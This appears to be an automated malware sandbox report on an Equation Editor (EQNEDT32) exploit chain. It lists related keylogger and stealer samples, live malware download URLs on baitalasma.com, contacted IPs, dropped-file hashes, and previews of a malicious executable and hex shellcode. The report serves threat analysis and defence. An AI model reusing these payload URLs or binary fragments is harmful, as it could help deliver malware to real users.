                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          TimeTypeDescription
                          01:12:03AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs
                          10:09:26API Interceptor551x Sleep call for process: EQNEDT32.EXE modified
                          10:12:00API Interceptor486x Sleep call for process: RegSvcs.exe modified
                          10:12:12API Interceptor10x Sleep call for process: wscript.exe modified
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          38.242.255.115SAT8765456000.xlam.xlsxGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                          • baitalasma.com/9876557.exe
                          0876543456700076.xlam.xlsxGet hashmaliciousRemcos, DBatLoaderBrowse
                          • baitalasma.com/FACT09865456000900.exe
                          Orden de compra 001-0025454.xlam.xlsxGet hashmaliciousUnknownBrowse
                          • baitalasma.com/Orden%20de%20compra%200001-002554.exe
                          T56700986579999.xlam.xlsxGet hashmaliciousUnknownBrowse
                          • baitalasma.com/Orden%20de%20compra-675100.exe
                          104.21.67.152DNXS-04-22.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                            PO 32187 #290424.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                              Payment_Advice.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                  e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                    rSyDiExlek.exeGet hashmaliciousSnake KeyloggerBrowse
                                      edlyEKgpaz.exeGet hashmaliciousSnake KeyloggerBrowse
                                        edlyEKgpaz.exeGet hashmaliciousSnake KeyloggerBrowse
                                          58208 Teklif.exeGet hashmaliciousSnake KeyloggerBrowse
                                            Zarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                              158.101.44.242Payment_Advice.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              Pnihosiyvr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              PsBygexGwH.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              SAT8765456000.xlam.xlsxGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              lxdriver_setup.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                              • checkip.dyndns.org/
                                              Hitomi Downloader.exeGet hashmaliciousAgent Tesla, AgentTesla, RisePro StealerBrowse
                                              • checkip.dyndns.org/
                                              e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              Payment_Draft_confirmation.xla.xlsxGet hashmaliciousSnake KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              baitalasma.comSAT8765456000.xlam.xlsxGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                              • 38.242.255.115
                                              0876543456700076.xlam.xlsxGet hashmaliciousRemcos, DBatLoaderBrowse
                                              • 38.242.255.115
                                              Orden de compra 001-0025454.xlam.xlsxGet hashmaliciousUnknownBrowse
                                              • 38.242.255.115
                                              T56700986579999.xlam.xlsxGet hashmaliciousUnknownBrowse
                                              • 38.242.255.115
                                              checkip.dyndns.comFATURA VE BELGELER..exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                              • 132.226.247.73
                                              Halkbank_Ekstre_20230426_075819_154055.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                              • 132.226.247.73
                                              PO_287104.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                              • 193.122.130.0
                                              DNXS-04-22.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                              • 193.122.130.0
                                              PO 32187 #290424.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                              • 193.122.6.168
                                              Payment_Advice.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 193.122.130.0
                                              Payment_Advice.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 158.101.44.242
                                              DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                              • 132.226.8.169
                                              SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exeGet hashmaliciousUnknownBrowse
                                              • 193.122.130.0
                                              SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exeGet hashmaliciousUnknownBrowse
                                              • 193.122.6.168
                                              reallyfreegeoip.orgFATURA VE BELGELER..exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                              • 172.67.177.134
                                              Halkbank_Ekstre_20230426_075819_154055.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                              • 172.67.177.134
                                              DNXS-04-22.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                              • 104.21.67.152
                                              PO 32187 #290424.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                              • 104.21.67.152
                                              Payment_Advice.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 172.67.177.134
                                              Payment_Advice.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 104.21.67.152
                                              DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                              • 172.67.177.134
                                              DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                              • 104.21.67.152
                                              e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 104.21.67.152
                                              rSyDiExlek.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 104.21.67.152
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              CLOUDFLARENETUSSupplier Order Scan 0001293039493.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                              • 104.26.13.205
                                              file.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 172.67.74.152
                                              DHL_VTER000105453.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 172.67.74.152
                                              DHL_VTER000105450.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 104.26.12.205
                                              DHL Receipt_AWB 9899691321..exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 172.67.74.152
                                              E7236252-receipt.vbsGet hashmaliciousXWormBrowse
                                              • 104.21.45.138
                                              I7336446-receipt.vbsGet hashmaliciousXWormBrowse
                                              • 172.67.215.45
                                              S94847456-receipt.vbsGet hashmaliciousXWormBrowse
                                              • 172.67.215.45
                                              S847453-receipt.vbsGet hashmaliciousXWormBrowse
                                              • 104.21.45.138
                                              4365078236450.LnK.lnkGet hashmaliciousUnknownBrowse
                                              • 172.67.139.174
                                              NATIXISUSNew Order INQ-087867.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 38.242.240.108
                                              http://dhlexpress.nameGet hashmaliciousUnknownBrowse
                                              • 38.242.142.127
                                              http://DhLexpress.nameGet hashmaliciousUnknownBrowse
                                              • 38.242.142.127
                                              http://DhLexpress.nameGet hashmaliciousUnknownBrowse
                                              • 38.242.142.127
                                              https://220420241.blob.core.windows.net/web/index.html?id=999Get hashmaliciousUnknownBrowse
                                              • 38.242.147.66
                                              Q2bIN963Kt.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 38.243.217.20
                                              Del3SHndZJ.elfGet hashmaliciousMiraiBrowse
                                              • 38.243.45.143
                                              SAT8765456000.xlam.xlsxGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                              • 38.242.255.115
                                              0876543456700076.xlam.xlsxGet hashmaliciousRemcos, DBatLoaderBrowse
                                              • 38.242.255.115
                                              Statement of Accounts.exeGet hashmaliciousAgentTeslaBrowse
                                              • 38.242.240.108
                                              ORACLE-BMC-31898USJJXXAhUWC.ps1Get hashmaliciousUnknownBrowse
                                              • 132.145.172.253
                                              PO_287104.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                              • 193.122.130.0
                                              DNXS-04-22.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                              • 193.122.130.0
                                              PO 32187 #290424.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                              • 193.122.6.168
                                              Payment_Advice.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 193.122.130.0
                                              Payment_Advice.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 158.101.44.242
                                              https://meet.servers.getgo.com/opener/e30.eyJpYXQiOjE3MTQ0OTcwOTYsImxhdW5jaFBhcmFtcyI6eyJidWlsZCI6IjE5OTUwIiwidGVsZW1ldHJ5VVJMIjoiaHR0cHM6Ly9sYXVuY2hzdGF0dXMuZ2V0Z28uY29tL2xhdW5jaGVyMi90ZWxlbWV0cnkvaGVscGVyP3Rva2VuPWcybS1yNGFnZXJmbmM4eGM1YnQwb2ZwY2poZC1iMTk5NTAtc2Nsc0pvaW5fYjBmZGI5NjFfNjM2OF80YTU2XzgwMTFfMmI0ZTlmYjEzNmRmIiwiZW5kcG9pbnRQYXJhbXMiOnsiUHJvZHVjdCI6ImcybSIsInNlc3Npb25UcmFja2luZ0lkIjoiY2xzSm9pbi1iMGZkYjk2MS02MzY4LTRhNTYtODAxMS0yYjRlOWZiMTM2ZGYiLCJsYXVuY2hVcmwiOiJtZWV0aW5nP3Nlc3Npb25UcmFja2luZ0lkPWNsc0pvaW4tYjBmZGI5NjEtNjM2OC00YTU2LTgwMTEtMmI0ZTlmYjEzNmRmJmNsaWVudEdlbmVyYXRpb249cm9sbGluZyIsImVudiI6ImxpdmUifX0sInZlcnNpb24iOiIxLjAiLCJmbG93VHlwZSI6ImpvaW4iLCJlbmRwb2ludEZsYXZvciI6eyJmbGF2b3IiOiJuZXV0cm9uIiwiZmxhdm9yRW5mb3JjZWQiOiJ0cnVlIn0sImlzRmxhdm9yRmluYWwiOnRydWV9.e30Get hashmaliciousUnknownBrowse
                                              • 150.136.248.95
                                              FiddlerSetup.5.0.20242.10753-latest.exe.7zGet hashmaliciousPureLog Stealer, zgRATBrowse
                                              • 192.29.11.142
                                              0t102oBJAv.elfGet hashmaliciousMiraiBrowse
                                              • 150.136.104.140
                                              0Vjz9RSZxz.elfGet hashmaliciousMiraiBrowse
                                              • 130.61.43.131
                                              CLOUDFLARENETUSSupplier Order Scan 0001293039493.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                              • 104.26.13.205
                                              file.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 172.67.74.152
                                              DHL_VTER000105453.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 172.67.74.152
                                              DHL_VTER000105450.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 104.26.12.205
                                              DHL Receipt_AWB 9899691321..exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 172.67.74.152
                                              E7236252-receipt.vbsGet hashmaliciousXWormBrowse
                                              • 104.21.45.138
                                              I7336446-receipt.vbsGet hashmaliciousXWormBrowse
                                              • 172.67.215.45
                                              S94847456-receipt.vbsGet hashmaliciousXWormBrowse
                                              • 172.67.215.45
                                              S847453-receipt.vbsGet hashmaliciousXWormBrowse
                                              • 104.21.45.138
                                              4365078236450.LnK.lnkGet hashmaliciousUnknownBrowse
                                              • 172.67.139.174
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              05af1f5ca1b87cc9cc9b25185115607dgetinher.docGet hashmaliciousAgentTeslaBrowse
                                              • 104.21.67.152
                                              • 172.67.177.134
                                              citat-05022024.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                              • 104.21.67.152
                                              • 172.67.177.134
                                              rE56cXOc25.rtfGet hashmaliciousAgentTeslaBrowse
                                              • 104.21.67.152
                                              • 172.67.177.134
                                              qneGb3RjUn.rtfGet hashmaliciousAgentTeslaBrowse
                                              • 104.21.67.152
                                              • 172.67.177.134
                                              INQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                                              • 104.21.67.152
                                              • 172.67.177.134
                                              nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                                              • 104.21.67.152
                                              • 172.67.177.134
                                              QF3YL9rOxB.rtfGet hashmaliciousAgentTeslaBrowse
                                              • 104.21.67.152
                                              • 172.67.177.134
                                              citat-05012024.xla.xlsxGet hashmaliciousUnknownBrowse
                                              • 104.21.67.152
                                              • 172.67.177.134
                                              cotizaci#U00f3n_04302024.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                              • 104.21.67.152
                                              • 172.67.177.134
                                              SecuriteInfo.com.Exploit.ShellCode.69.24915.2103.rtfGet hashmaliciousAgentTeslaBrowse
                                              • 104.21.67.152
                                              • 172.67.177.134
                                              7dcce5b76c8b17472d024758970a406bscanned fax.docxGet hashmaliciousUnknownBrowse
                                              • 38.242.255.115
                                              getinher.docGet hashmaliciousAgentTeslaBrowse
                                              • 38.242.255.115
                                              citat-05022024.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                              • 38.242.255.115
                                              PAYROLL.docGet hashmaliciousFormBookBrowse
                                              • 38.242.255.115
                                              Arrival Notice.docGet hashmaliciousFormBookBrowse
                                              • 38.242.255.115
                                              rE56cXOc25.rtfGet hashmaliciousAgentTeslaBrowse
                                              • 38.242.255.115
                                              qneGb3RjUn.rtfGet hashmaliciousAgentTeslaBrowse
                                              • 38.242.255.115
                                              ls3wzs2VQr.rtfGet hashmaliciousUnknownBrowse
                                              • 38.242.255.115
                                              INQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                                              • 38.242.255.115
                                              MOQ010524Purchase order.docGet hashmaliciousFormBookBrowse
                                              • 38.242.255.115
                                              No context
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):4.43530643106624
                                              Encrypted:false
                                              SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
                                              MD5:4F8E702CC244EC5D4DE32740C0ECBD97
                                              SHA1:3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
                                              SHA-256:9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
                                              SHA-512:21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):1357312
                                              Entropy (8bit):6.788018216695586
                                              Encrypted:false
                                              SSDEEP:24576:uqDEvCTbMWu7rQYlBQcBiT6rprG8aj5OV969dMSEOQOTxK:uTvC/MTQYxsWR7aj5ODudMSEO
                                              MD5:FBCCDD35EE6DCCADAEAA69E37FBBD171
                                              SHA1:D076D0BE3A846AFCE258DEF238BF7EF5FE5CACD5
                                              SHA-256:A0EAE98F6ADB6DD377456733EEDC98A453211B456E7F934818B584CCC74B1DE3
                                              SHA-512:A106A75FFC8042ECE8AC3E32F1BF2534C56C917F1540288C9685FDB9B832BE8CE8DAD4CDE914165C477A3ED0153FEFC92E3ED1119B8EED340E85D0A3538BF791
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...r.5f..........".................w.............@.......................................@...@.......@.....................d...|....@...J.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....J...@...L..................@..@.reloc...u.......v...@..............@..B........................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\AppData\Roaming\negrett.exe
                                              File Type:ASCII text, with very long lines (29744), with no line terminators
                                              Category:dropped
                                              Size (bytes):29744
                                              Entropy (8bit):3.561321965091604
                                              Encrypted:false
                                              SSDEEP:768:wiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbQE+IrCim4vfF3if6gyO:wiTZ+2QoioGRk6ZklputwjpjBkCiw2Ru
                                              MD5:518C70484039975D7C4CDF9C2801944B
                                              SHA1:7F0E0A4CE1EECC2C0ADC2475D1DB65048D2789DB
                                              SHA-256:3F43AC964B27B4A9E2EE511E5309EBEA2D3EFEE90AF5C95BD4136DE09A37D741
                                              SHA-512:F9B4A980E10B4FAA4052C1118DB3BF16C394D6BCF7963CECF91105F682C808898EEFF5FF717D735B3D56A76822C9552AD09A749BDD303AA1865349B65261599D
                                              Malicious:false
                                              Reputation:low
                                              Preview:048B4C24088B008B093BC8760483C8FFC31BC0F7D8C38B0x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c0000006689957cffffffb86c00000066
                                              Process:C:\Users\user\AppData\Roaming\negrett.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):228236
                                              Entropy (8bit):7.978584093261845
                                              Encrypted:false
                                              SSDEEP:6144:j0PAE/6C+dNnxdEK2+CpQv8tvmUuh8ACqCi7cxFALh:wPAE/bmnDb2D9mReFALh
                                              MD5:F1180A55F1DAC9F9BB49C5DDB5713F1B
                                              SHA1:1F23E1CA54E4C92482B9E22C86E7A856F8D91C31
                                              SHA-256:9AB94DB31D4F78D1343D0FA8E82CA9092308F511D487290F7B5FF4A1E29A88BD
                                              SHA-512:B08013D12A5033F9EB3D991859D491B008FCDD6CD91A81B7240AFA69638424A787D94D0372F92F020E8B3D887BC905F5585E521F6399CCF5573D1DC4A3BF6E0F
                                              Malicious:false
                                              Reputation:low
                                              Preview:EA06......;SZ..aI....N^..K..&s).*.B.Q&.z$.5....0..iR.R. .....gh.8Oj..T..C.F0.+.....K..Z<.-..eq.UJCY...R.tf.F.F$r....f..k...=....3Q.m..I.yj...6....f......vu?...*Of....'.......R..~...l.N..=.....S"...R[V... ...n....T1K.*k...)4.T.(.9..*.C..g.z&..5.h& ..o>.8J.8..8..... ..0...3<...Rm7.M.S]}.eI....I.J..q.U~.F...b....l.c2...2I..AR...}.L..kH.l.....&..9....E...m...>`.8S: ..|.p.R.s.....t.L%1..NK@..T.P.....p.G.y.L.Qit.m'..`@...eI..@... ....L._[..;........X.....B.7.....*T,....h...?...../6..).^6..].JqU....O.V&.O....Kfx+.+...b??.G....b..^ejg.....<.-.....5.e..v...^......x..z.O...X.......&..$.[.|)_[W".4.L..............."..4.J._.3Mn.iy..hs./..E.D9.I.*.S.Oi<.".;.N.3lw.c...(Tn%2a......+.K.k..~.W.<....`..q..m... ..q:d...,.{tw..Q&.{.....@......]......2.U@F..6.o..(7.6.m<...J.".6.xf>jNs....f.J]....L6...........R[8.s.+..m=..v.5...dS.&C...L...<. ..hT...#L.]-..|.6.R..y.....Z.4i....Z..~m..'..>\i...|.....v....sn...o.R.p-..L'...... ..P....:...D.....aL..|.f..D...._......k].A].
                                              Process:C:\Users\user\AppData\Roaming\negrett.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):9998
                                              Entropy (8bit):7.5935274912491515
                                              Encrypted:false
                                              SSDEEP:192:m+cKgzEeSCO8vvL3c04qyed8ipotr9EVgNcvWiN/81gokDWxkg10Gg:97gQeSCOO3nyed8My9EVgNcvR2yg10Gg
                                              MD5:D4675AE4BCED0DBEEDB90230CF2B6179
                                              SHA1:85785B7167135E7683795A6C56282693D7C15992
                                              SHA-256:94955C3E9542147426F2538F79304E8BCAAF7D7FA0FA4EB6BEA54D790D73C9B6
                                              SHA-512:005AC8D4FE05C07418D47F1130ED0CAC6776649FAD2CF0554BF6A608E7900E876083D0F3287D1F98615A6DDE0031BDD7A59F07F4CE7529B58B5A7431DA1CEA32
                                              Malicious:false
                                              Reputation:low
                                              Preview:EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...
                                              Process:C:\Users\user\AppData\Local\directory\name.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):228236
                                              Entropy (8bit):7.978584093261845
                                              Encrypted:false
                                              SSDEEP:6144:j0PAE/6C+dNnxdEK2+CpQv8tvmUuh8ACqCi7cxFALh:wPAE/bmnDb2D9mReFALh
                                              MD5:F1180A55F1DAC9F9BB49C5DDB5713F1B
                                              SHA1:1F23E1CA54E4C92482B9E22C86E7A856F8D91C31
                                              SHA-256:9AB94DB31D4F78D1343D0FA8E82CA9092308F511D487290F7B5FF4A1E29A88BD
                                              SHA-512:B08013D12A5033F9EB3D991859D491B008FCDD6CD91A81B7240AFA69638424A787D94D0372F92F020E8B3D887BC905F5585E521F6399CCF5573D1DC4A3BF6E0F
                                              Malicious:false
                                              Reputation:low
                                              Preview:EA06......;SZ..aI....N^..K..&s).*.B.Q&.z$.5....0..iR.R. .....gh.8Oj..T..C.F0.+.....K..Z<.-..eq.UJCY...R.tf.F.F$r....f..k...=....3Q.m..I.yj...6....f......vu?...*Of....'.......R..~...l.N..=.....S"...R[V... ...n....T1K.*k...)4.T.(.9..*.C..g.z&..5.h& ..o>.8J.8..8..... ..0...3<...Rm7.M.S]}.eI....I.J..q.U~.F...b....l.c2...2I..AR...}.L..kH.l.....&..9....E...m...>`.8S: ..|.p.R.s.....t.L%1..NK@..T.P.....p.G.y.L.Qit.m'..`@...eI..@... ....L._[..;........X.....B.7.....*T,....h...?...../6..).^6..].JqU....O.V&.O....Kfx+.+...b??.G....b..^ejg.....<.-.....5.e..v...^......x..z.O...X.......&..$.[.|)_[W".4.L..............."..4.J._.3Mn.iy..hs./..E.D9.I.*.S.Oi<.".;.N.3lw.c...(Tn%2a......+.K.k..~.W.<....`..q..m... ..q:d...,.{tw..Q&.{.....@......]......2.U@F..6.o..(7.6.m<...J.".6.xf>jNs....f.J]....L6...........R[8.s.+..m=..v.5...dS.&C...L...<. ..hT...#L.]-..|.6.R..y.....Z.4i....Z..~m..'..>\i...|.....v....sn...o.R.p-..L'...... ..P....:...D.....aL..|.f..D...._......k].A].
                                              Process:C:\Users\user\AppData\Local\directory\name.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):9998
                                              Entropy (8bit):7.5935274912491515
                                              Encrypted:false
                                              SSDEEP:192:m+cKgzEeSCO8vvL3c04qyed8ipotr9EVgNcvWiN/81gokDWxkg10Gg:97gQeSCOO3nyed8My9EVgNcvR2yg10Gg
                                              MD5:D4675AE4BCED0DBEEDB90230CF2B6179
                                              SHA1:85785B7167135E7683795A6C56282693D7C15992
                                              SHA-256:94955C3E9542147426F2538F79304E8BCAAF7D7FA0FA4EB6BEA54D790D73C9B6
                                              SHA-512:005AC8D4FE05C07418D47F1130ED0CAC6776649FAD2CF0554BF6A608E7900E876083D0F3287D1F98615A6DDE0031BDD7A59F07F4CE7529B58B5A7431DA1CEA32
                                              Malicious:false
                                              Preview:EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...
                                              Process:C:\Users\user\AppData\Local\directory\name.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):228236
                                              Entropy (8bit):7.978584093261845
                                              Encrypted:false
                                              SSDEEP:6144:j0PAE/6C+dNnxdEK2+CpQv8tvmUuh8ACqCi7cxFALh:wPAE/bmnDb2D9mReFALh
                                              MD5:F1180A55F1DAC9F9BB49C5DDB5713F1B
                                              SHA1:1F23E1CA54E4C92482B9E22C86E7A856F8D91C31
                                              SHA-256:9AB94DB31D4F78D1343D0FA8E82CA9092308F511D487290F7B5FF4A1E29A88BD
                                              SHA-512:B08013D12A5033F9EB3D991859D491B008FCDD6CD91A81B7240AFA69638424A787D94D0372F92F020E8B3D887BC905F5585E521F6399CCF5573D1DC4A3BF6E0F
                                              Malicious:false
                                              Preview:EA06......;SZ..aI....N^..K..&s).*.B.Q&.z$.5....0..iR.R. .....gh.8Oj..T..C.F0.+.....K..Z<.-..eq.UJCY...R.tf.F.F$r....f..k...=....3Q.m..I.yj...6....f......vu?...*Of....'.......R..~...l.N..=.....S"...R[V... ...n....T1K.*k...)4.T.(.9..*.C..g.z&..5.h& ..o>.8J.8..8..... ..0...3<...Rm7.M.S]}.eI....I.J..q.U~.F...b....l.c2...2I..AR...}.L..kH.l.....&..9....E...m...>`.8S: ..|.p.R.s.....t.L%1..NK@..T.P.....p.G.y.L.Qit.m'..`@...eI..@... ....L._[..;........X.....B.7.....*T,....h...?...../6..).^6..].JqU....O.V&.O....Kfx+.+...b??.G....b..^ejg.....<.-.....5.e..v...^......x..z.O...X.......&..$.[.|)_[W".4.L..............."..4.J._.3Mn.iy..hs./..E.D9.I.*.S.Oi<.".;.N.3lw.c...(Tn%2a......+.K.k..~.W.<....`..q..m... ..q:d...,.{tw..Q&.{.....@......]......2.U@F..6.o..(7.6.m<...J.".6.xf>jNs....f.J]....L6...........R[8.s.+..m=..v.5...dS.&C...L...<. ..hT...#L.]-..|.6.R..y.....Z.4i....Z..~m..'..>\i...|.....v....sn...o.R.p-..L'...... ..P....:...D.....aL..|.f..D...._......k].A].
                                              Process:C:\Users\user\AppData\Local\directory\name.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):9998
                                              Entropy (8bit):7.5935274912491515
                                              Encrypted:false
                                              SSDEEP:192:m+cKgzEeSCO8vvL3c04qyed8ipotr9EVgNcvWiN/81gokDWxkg10Gg:97gQeSCOO3nyed8My9EVgNcvR2yg10Gg
                                              MD5:D4675AE4BCED0DBEEDB90230CF2B6179
                                              SHA1:85785B7167135E7683795A6C56282693D7C15992
                                              SHA-256:94955C3E9542147426F2538F79304E8BCAAF7D7FA0FA4EB6BEA54D790D73C9B6
                                              SHA-512:005AC8D4FE05C07418D47F1130ED0CAC6776649FAD2CF0554BF6A608E7900E876083D0F3287D1F98615A6DDE0031BDD7A59F07F4CE7529B58B5A7431DA1CEA32
                                              Malicious:false
